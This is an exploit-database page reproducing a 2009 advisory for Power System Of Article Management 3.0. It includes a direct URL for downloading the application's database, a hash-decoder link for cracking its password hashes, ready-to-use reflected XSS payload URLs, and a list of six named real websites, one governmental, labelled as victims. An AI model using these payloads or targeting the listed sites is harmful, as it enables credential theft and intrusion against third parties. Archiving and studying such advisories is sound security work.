header-logo
Suggest Exploit
vendor:
Power System Of Article Management
by:
Pouya_Server
7.5
CVSS
HIGH
DD/XSS
79
CWE
Product Name: Power System Of Article Management
Affected Version From: 3
Affected Version To: 3
Patch Exists: NO
Related CWE: N/A
CPE: a:pouya_server:power_system_of_article_management
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Power System Of Article Management 3.0 DD/XSS Vulnerability

A vulnerability exists in Power System Of Article Management 3.0 which allows an attacker to inject malicious code into the vulnerable application. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerability is due to insufficient sanitization of user-supplied input to the 'ComeUrl' parameter in the 'userchklogin.asp' and 'userlogin.asp' scripts. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. Successful exploitation may allow an attacker to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: Power System Of Article Management
Version : 3.0
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD/XSS)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/database/yiuwekdsodksldfslwifds.mdb
Hash Decoder :
http://pouya2006.persiangig.com/dec/PSOAMv3.html
or Google searching ...
 
[XSS]:
http://site.com/[Path]/userchklogin.asp?UserName=Pouya&Password=Pouya&CookieDate=0&ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&Submit=%C8%B7%C8%CF

http://site.com/[Path]/userlogin.asp?ComeUrl=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
---------------------------------
Victem :
http://www.honeyjenny.com/art
http://www.hzyzzz.com
http://cdzy.cn/wyx/article
http://unix-cd.com/article
http://zhuyaren.com
http://www.ahss.gov.cn
---------------------------------------------------------
#########################################################

# milw0rm.com [2009-02-04]

Navigation

Suggest Exploit

Services By CQR